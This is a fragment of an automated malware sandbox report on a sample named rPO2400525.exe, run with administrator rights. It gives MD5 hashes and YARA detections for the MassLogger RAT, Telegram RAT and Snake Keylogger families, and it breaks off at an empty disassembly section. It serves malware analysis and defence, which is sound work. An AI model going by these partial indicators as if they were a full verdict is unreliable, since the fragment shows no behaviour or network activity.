                                                      Has exited:true

                                                      General

                                                      Target ID:5
                                                      Start time:22:01:14
                                                      Start date:18/02/2025
                                                      Path:C:\Users\user\Desktop\rPO2400525.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\rPO2400525.exe"
                                                      Imagebase:0x9b0000
                                                      File size:626'688 bytes
                                                      MD5 hash:9393C3E2268FE4C15DA55F0D5233245D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                      Reputation:low
                                                      Has exited:false

                                                      General

                                                      Target ID:6
                                                      Start time:22:01:17
                                                      Start date:18/02/2025
                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                      Imagebase:0x7ff6ef0c0000
                                                      File size:496'640 bytes
                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Disassembly

                                                      Reset < >